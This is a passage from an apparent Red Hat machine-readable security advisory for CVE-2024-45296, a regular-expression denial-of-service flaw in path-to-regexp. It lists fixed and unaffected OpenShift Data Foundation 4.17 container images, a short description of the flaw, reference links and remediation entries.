"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310908"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "path-to-regexp: Backtracking regular expressions cause ReDoS",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45296"
},
{
"category": "external",
"summary": "RHBZ#2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f",
"url": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6",
"url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j",
"url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j"
}
],
"release_date": "2024-09-09T19:15:13.330000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
